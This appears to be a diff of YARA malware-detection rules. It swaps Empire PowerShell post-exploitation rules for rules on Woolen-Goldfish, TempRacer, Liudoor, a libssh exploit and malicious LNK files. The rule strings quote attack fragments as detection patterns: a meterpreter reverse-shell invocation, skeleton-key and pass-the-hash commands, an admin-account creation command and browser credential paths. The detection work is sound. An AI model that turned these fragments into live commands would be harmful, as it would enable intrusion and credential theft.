+		date = "2015-12-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L47-L63"
+		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_phish_gina_dec15.yar#L49-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ae8875f7fcb8b4de5cf9721a9f5a9f7782f7c436c86422060ecdc5181e31092f"
-		logic_hash = "3c398aa180b6f2225a25f9b1430e89991c7e391930e2be140e89c67da67b3614"
-		score = 70
+		logic_hash = "a2820b024b371447eab71f153b6251776719cfe55e08cb2a3cda5ee6da29949d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
+		hash2 = "e6c5b55586e9d99551adc27a0fc9c080cea6201fae60104b82d5a2ec518fafb6"
+		hash3 = "80f278b7268ea6814f8b336e07c5f4b03289519e199fbe4cbd9ef6a38cf25df6"
+		hash4 = "3a0a758525883a049a42312e46a023076c31af23b5e8e5b81fec56d51e4c80fb"
+		hash5 = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
+		hash6 = "d9db7d32949c4df6a5d9d0292b576ae19681be7b6e0684df57338390e87fc6d6"
+		hash7 = "7bb705701ae73d377f6091515a140f0af57703719a67da9a60fad4544092ee6c"
+		hash8 = "e743c6e7749ab1046a2beea8733d7c8386ea60b43492bb4f0769ced6a2cee66d"
 
 	strings:
-		$s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii
-		$s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii
-		$s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii
+		$s1 = "Execute" ascii
+		$s2 = "Process WriteParameterFiles" fullword ascii
+		$s3 = "WScript.Shell" fullword ascii
+		$s4 = "STOCKMASTER" fullword ascii
+		$s5 = "InsertEmailFax" ascii
 
 	condition:
-		filesize < 108KB and 1 of them
+		uint16( 0 ) == 0xcfd0 and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Portscan : FILE
+rule SIGNATURE_BASE_Tempracer : FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py"
+		description = "Detects privilege escalation tool - file TempRacer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "23a0f769-9155-5aa0-9200-2baf827bdda4"
-		date = "2015-08-06"
+		id = "edba6471-9720-5aad-8c15-386197700c83"
+		date = "2016-03-30"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L65-L80"
+		reference = "http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_tempracer.yar#L10-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b355efa1e7b3681b1402e22c58ce968795ef245fd08a0afb948d45c173e60b97"
-		logic_hash = "162ac4ccc8629a2d017831cdc6d1bf8d7a62b844bf68a0d61956b2f41a5e004b"
-		score = 70
+		hash = "e17d80c4822d16371d75e1440b6ac44af490b71fbee1010a3e8a5eca94d22bb3"
+		logic_hash = "37355456e13ea9fa6429b68970e0450f4ddbd8da81c070a0383b1e048a05e35a"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii
-		$s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii
+		$s1 = "\\obj\\Release\\TempRacer.pdb" ascii
+		$s2 = "[+] Injecting into " fullword wide
+		$s3 = "net localgroup administrators alex /add" fullword wide
+		$s4 = "[+] File: {0} renamed to {1}" fullword wide
+		$s5 = "[+] Blocking " fullword wide
 
 	condition:
-		filesize < 14KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 25KB and 1 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Shellcode : FILE
+rule SIGNATURE_BASE_Woolengoldfish_Sample_1
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1"
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
 		author = "Florian Roth (Nextron Systems)"
-		id = "41788f71-cc99-50b3-bdc7-17b132ab2767"
-		date = "2015-08-06"
+		id = "923de51a-8422-5318-95f5-79613d2d642e"
+		date = "2015-03-25"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L82-L98"
+		reference = "http://goo.gl/NpJpVZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_woolengoldfish.yar#L13-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
-		logic_hash = "968a140f75aa17bd9aac243483cade931dc047854b65b2f61146492c2cf01ea5"
-		score = 70
+		hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
+		logic_hash = "9490715a2fc7d3c742771a8211bcfb4c0a0bafba4d5de8eee5825fdabaded6af"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii
-		$s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii
-		$s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii
+		$s1 = "Cannot execute (%d)" fullword ascii
+		$s16 = "SvcName" fullword ascii
 
 	condition:
-		filesize < 100KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Mimikatz : FILE
+rule SIGNATURE_BASE_Woolengoldfish_Generic_1
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1"
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f7d6c1c4-2a24-54fd-b745-32d7894affc8"
-		date = "2015-08-06"
+		id = "351f5ee5-c0ec-51b6-9953-2b64e3e74b09"
+		date = "2015-03-25"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L100-L116"
+		reference = "http://goo.gl/NpJpVZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_woolengoldfish.yar#L30-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c5481864b757837ecbc75997fa24978ffde3672b8a144a55478ba9a864a19466"
-		logic_hash = "3e16bed3dd7b36920cdf01507f35e38d004e3ce2f3301911a8ee4aedbae6c5c3"
-		score = 70
+		logic_hash = "79879be4f49c8830573eb4a9f958ef9060413ea8b5dd3f8f3d5816e146d3a0b7"
+		score = 90
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
+		hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
+		hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
 
 	strings:
-		$s1 = "$PEBytes64 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc" ascii
-		$s2 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)" fullword ascii
-		$s3 = "Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii
+		$x0 = "Users\\Wool3n.H4t\\"
+		$x1 = "C-CPP\\CWoolger"
+		$x2 = "NTSuser.exe" fullword wide
+		$s1 = "107.6.181.116" fullword wide
+		$s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
+		$s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
+		$s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
+		$s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
+		$s6 = "wlg.dat" fullword
+		$s7 = "woolger" fullword wide
+		$s8 = "[Enter]" fullword
+		$s9 = "[Control]" fullword
 
 	condition:
-		filesize < 2500KB and 2 of them
+		(1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Empire_Lib_Modules_Credentials_Mimikatz_Pth : FILE
+rule SIGNATURE_BASE_Woolengoldfish_Generic_2
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file pth.py"
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f954b7e8-e820-5111-ba8d-a9b9779381b0"
-		date = "2015-08-06"
+		id = "930b928f-ff32-56b2-9e3c-dd80036ff7ef"
+		date = "2015-03-25"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L118-L133"
+		reference = "http://goo.gl/NpJpVZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_woolengoldfish.yar#L62-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6dee1cf931e02c5f3dc6889e879cc193325b39e18409dcdaf987b8bf7c459211"
-		logic_hash = "6989c2e50ce642e0300e1293f46cd36e5141274d1e7172a8312595bb515bede2"
-		score = 70
+		logic_hash = "25d2ea25543b0a6330e443333f1ac7a59874631c8ee7faeb4ea6d94c62c255fc"
+		score = 90
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
+		hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
+		hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
+		hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
 
 	strings:
-		$s0 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
-		$s1 = "command = \"sekurlsa::pth /user:\"+self.options[\"user\"]['Value']" fullword ascii
+		$s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
 
 	condition:
-		filesize < 12KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Empire_Write_Hijackdll : FILE
+rule SIGNATURE_BASE_Woolengoldfish_Generic_3
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1"
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a80af21-fb01-5996-b14d-44ff55b7fb3e"
-		date = "2015-08-06"
+		id = "5c227d24-624c-5fb5-a2ea-a971fda8bfba"
+		date = "2015-03-25"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L135-L151"
+		reference = "http://goo.gl/NpJpVZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_woolengoldfish.yar#L81-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "155fa7168e28f15bb34f67344f47234a866e2c63b3303422ff977540623c70bf"
-		logic_hash = "e01157fe4adaf647474292bfbbb8196c0b7e89433da52a386a8d9573ae543679"
-		score = 70
-		quality = 85
-		tags = "FILE"
+		logic_hash = "ac51c25ad6ef6668238fef1de50517d48e6509f57cd6dd723595777ae16d8a6c"
+		score = 90
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
+		hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
 
 	strings:
-		$s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii
-		$s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii
-		$s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii
+		$x1 = "... get header FATAL ERROR !!!  %d bytes read > header_size" fullword ascii
+		$x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
+		$x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
+		$s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
+		$s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
+		$s2 = "Attempting to unlock uninitialized lock!" fullword ascii
+		$s4 = "unable to load kernel32.dll" fullword ascii
+		$s5 = "index.php?c=%S&r=%x" fullword wide
+		$s6 = "%s len:%d " fullword ascii
+		$s7 = "Encountered error sending syscall response to client" fullword ascii
+		$s9 = "/info.dat" fullword ascii
+		$s10 = "Error entering thread lock" fullword ascii
+		$s11 = "Error exiting thread lock" fullword ascii
+		$s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
 
 	condition:
-		filesize < 500KB and 2 of them
+		(1 of ( $x* ) ) or ( 8 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Empire_Skeleton_Key : FILE
+rule SIGNATURE_BASE_APT_Liudoor : WIN32_DLL
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d508e09e-13e8-5866-bb5b-0d886f960bb5"
-		date = "2015-08-06"
+		description = "Detects Liudoor daemon backdoor"
+		author = "RSA FirstWatch"
+		id = "cf7e08b8-2ccd-5828-917b-11340b4a86b1"
+		date = "2015-07-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L153-L170"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_terracotta_liudoor.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3d02f16dcc38faaf5e97e4c5dbddf761f2816004775e6af8826cde9e29bb750f"
-		logic_hash = "910451b2b2ed7cb5f7891d97d15e49da24b182adc903926f539fc4bfe589f2d5"
-		score = 70
+		logic_hash = "6f60002d0173a8ebd2b407e79377d4816e699742aedb1e0649b08fd4ca6cf359"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "WIN32 DLL"
+		hash0 = "78b56bc3edbee3a425c96738760ee406"
+		hash1 = "5aa0510f6f1b0e48f0303b9a4bfc641e"
+		hash2 = "531d30c8ee27d62e6fbe855299d0e7de"
+		hash3 = "2be2ac65fd97ccc97027184f0310f2f3"
+		hash4 = "6093505c7f7ec25b1934d3657649ef07"
+		type = "Win32 DLL"
 
 	strings:
-		$s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii
-		$s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii
-		$s3 = "command = \"misc::skeleton\"" fullword ascii
-		$s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii
+		$string0 = "Succ"
+		$string1 = "Fail"
+		$string2 = "pass"
+		$string3 = "exit"
+		$string4 = "svchostdllserver.dll"
+		$string5 = "L$,PQR"
+		$string6 = "0/0B0H0Q0W0k0"
+		$string7 = "QSUVWh"
+		$string8 = "Ht Hu["
 
 	condition:
-		filesize < 6KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Wmi : FILE
+rule SIGNATURE_BASE_HKTL_EXPL_POC_Libssh_Auth_Bypass_CVE_2023_2283_Jun23_1 : CVE_2023_2283 FILE
 {
 	meta:
-		description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1e1d1e71-6ea9-500a-b8b8-c48a64bc2b54"
-		date = "2015-08-06"
+		description = "Detects POC code used in attacks against libssh vulnerability CVE-2023-2283"
+		author = "Florian Roth"
+		id = "e72eba33-686f-5fca-bca3-2b875d1ec224"
+		date = "2023-06-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/PowerShellEmpire/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L172-L188"
+		reference = "https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_libssh_cve_2023_2283_jun23.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a914cb227f652734a91d3d39745ceeacaef7a8b5e89c1beedfd6d5f9b4615a1d"
-		logic_hash = "7179a22eec8eb9e59bf590e671e6849d5b960c58eb8fa591bc3b340d64f1d076"
-		score = 70
+		logic_hash = "4c3d54d7f4902c1da664e41096b5931e6534aaaf63243f12e05b81af63d8b28f"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-2283, FILE"
 
 	strings:
-		$s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
-		$s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii
-		$s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii
+		$s1 = "nprocs = %d" ascii fullword
+		$s2 = "fork failed: %s" ascii fullword
 
 	condition:
-		filesize < 20KB and 2 of them
+		uint16( 0 ) == 0x457f and all of them
 }
-rule SIGNATURE_BASE_Winagent_Badpatch_1 : FILE
+rule SIGNATURE_BASE_SUSP_LNK_Embedded_Worddoc : FILE
 {
 	meta:
-		description = "Detects samples mentioned in BadPatch report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "732792ed-cb70-5b69-8457-f54177e4609e"
-		date = "2017-10-20"
+		description = "check for LNK files with indications of the Word program or an embedded doc"
+		author = "Greg Lesnewich"
+		id = "9677d41a-9d29-510c-98cd-122dc0ca9606"
+		date = "2023-01-02"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/RvDwwA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bad_patch.yar#L11-L39"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L3-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "568086edb8884877f9dcb0cffa1e4c05164e6884bf80ce50692cedfa3e8d5750"
-		score = 75
+		hash = "120ca851663ef0ebef585d716c9e2ba67bd4870865160fec3b853156be1159c5"
+		logic_hash = "a53fbfe0ccb5a4ab2320cde10d17f29770d888cf21cda4fdccc3d7ae8d123293"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "285998bce9692e46652529685775aa05e3a5cb93ee4e65d021d2231256e92813"
+		version = "1.0"
+		DaysofYARA = "2/100"
 
 	strings:
-		$x1 = "J:\\newPatch\\downloader\\" wide
-		$x2 = "L:\\rashed\\New code\\" wide
-		$x3 = ":\\newPatch\\last version\\" wide
-		$x4 = "\\Microsoft\\Microsoft\\Microsoft1.log" wide
-		$x5 = "\\Microsoft\\Microsoft\\Microsoft.log" wide
-		$x6 = "\\Microsoft\\newPP.exe" wide
-		$x7 = " (this is probably a proxy server error)." fullword wide
-		$x8 = " :Old - update patch and check anti-virus.. " fullword wide
-		$x9 = "PatchNotExit-- download now.. " fullword wide
-		$x10 = "PatchNotExit-- Check Version" fullword wide
-		$x11 = "PatchNotExit-- Version Patch" fullword wide
-		$s1 = "downloader " fullword wide
-		$s2 = "DelDownloadFile" fullword ascii
-		$s3 = "downloadFile" fullword ascii
-		$s4 = "downloadUpdate" fullword wide
+		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
+		$icon_loc = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.exe" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 4 of them ) )
+		uint32be( 0x0 ) == 0x4C000000 and filesize > 10KB and any of them
 }
-rule SIGNATURE_BASE_Winagent_Badpatch_2 : FILE
+rule SIGNATURE_BASE_SUSP_LNK_Smallscreensize
 {
 	meta:
-		description = "Detects samples mentioned in BadPatch report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "648528f0-351c-527e-b516-2c8cae9fb4a3"
-		date = "2017-10-20"
+		description = "check for LNKs that have a screen buffer size and WindowSize dimensions of 1x1"
+		author = "Greg Lesnewich"
+		id = "6194a76b-36d6-51d1-8d53-2e11172e29d2"
+		date = "2023-01-01"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/RvDwwA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bad_patch.yar#L41-L74"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L22-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "649cfca8fa9d3b9f12b56fd81d4133a00eb5449e67fca2abe85fbfb778912df8"
-		score = 75
+		logic_hash = "285985c21e34f8412b49dbfe04abad9f93af195801d0a8870ec3795b8a9a3787"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "106deff16a93c4a4624fe96e3274e1432921c56d5a430834775e5b98861c00ea"
-		hash2 = "ece76fdf7e33d05a757ef5ed020140d9367c7319022a889923bbfacccb58f4d7"
-		hash3 = "cf53fc8c9ce4e5797cc5ac6f71d4cbc0f2b15f2ed43f38048a5273f40bc09876"
-		hash4 = "802a39b22dfacdc2325f8a839377c903b4a7957503106ce6f7aed67e824b82c2"
-		hash5 = "278dba3857367824fc2d693b7d96cef4f06cb7fdc52260b1c804b9c90d43646d"
-		hash6 = "2941f75da0574c21e4772f015ef38bb623dd4d0c81c263523d431b0114dd847e"
-		hash7 = "46f3afae22e83344e4311482a9987ed851b2de282e8127f64d5901ac945713c0"
-		hash8 = "27752bbb01abc6abf50e1da3a59fefcce59618016619d68690e71ad9d4a3c247"
-		hash9 = "050610cfb3d3100841685826273546c829335a5f4e2e4260461b88367ad9502c"
+		tags = ""
+		version = "1.0"
+		DaysofYARA = "1/100"
 
 	strings:
-		$s1 = "myAction=shell_result&serialNumber=" fullword wide
-		$s2 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.*" wide
-		$s3 = "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" wide
-		$s4 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.*" wide
-		$s5 = "newSHELL[" fullword wide
-		$s6 = "\\file1.txt" wide
-		$s7 = "myAction=newGIF&serialNumber=" fullword wide
-		$s8 = "\\Storege1" wide
-		$s9 = "\\Microsoft\\mac.txt" wide
-		$s10 = "spytube____:" fullword ascii
-		$s11 = "0D0700045F5C5B0312045A04041F40014B1D11004A1F19074A141100011200154B031C04" fullword wide
-		$s12 = "16161A1000012B162503151851065A1A0007" fullword wide
-		$s13 = "-- SysFile...." fullword wide
+		$dimensions = {02 00 00 A0 ?? 00 ?? ?? 01 00 01 00 01}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 3 of them )
+		uint32be( 0x0 ) == 0x4c000000 and all of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_COVID19_Apr20_1 : FILE
+rule SIGNATURE_BASE_MAL_Janicab_LNK
 {
 	meta:
-		description = "Detects ransomware distributed in COVID-19 theme"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fc723d1f-e969-5af6-af57-70d00bf797f4"
-		date = "2020-04-15"
+		description = "detect LNK files used in Janicab infection chain"
+		author = "Greg Lesnewich"
+		id = "c21844d3-eeee-530e-a69c-b7f604616f0b"
+		date = "2023-01-01"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_covid_ransom.yar#L2-L20"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L46-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b32ce1dff9d27c5f7541de97cd1198b0d837a69ee260b327c66a22ca6f30091"
+		hash = "0c7e8427ee61672568983e51bf03e0bcf6f2e9c01d2524d82677b20264b23a3f"
+		hash = "22ede766fba7551ad0b71ef568d0e5022378eadbdff55c4a02b42e63fcb3b17c"
+		hash = "4920e6506ca557d486e6785cb5f7e4b0f4505709ffe8c30070909b040d3c3840"
+		hash = "880607cc2da4c3213ea687dabd7707736a879cc5f2f1d4accf79821e4d24d870"
+		hash = "f4610b65eba977b3d13eba5da0e38788a9e796a3e9775dd2b8e37b3085c2e1af"
+		logic_hash = "f9c000ffb6a95d616459e00f0220ad26cb1df77e35582d14dfce1637ddfb466c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326"
+		tags = ""
+		version = "1.0"
+		DaysofYARA = "1/100"
 
 	strings:
-		$s1 = "/savekey.php" wide
-		$op1 = { 3f ff ff ff ff ff 0b b4 }
-		$op2 = { 60 2e 2e 2e af 34 34 34 b8 34 34 34 b8 34 34 34 }
-		$op3 = { 1f 07 1a 37 85 05 05 36 83 05 05 36 83 05 05 34 }
+		$j_pdf1 = "%PDF-1.5" ascii wide
+		$j_cmd = "\\Windows\\System32\\cmd.exe" ascii wide
+		$j_pdf_stream = "endstream" ascii wide
+		$j_pdb_obj = "endobj" ascii wide
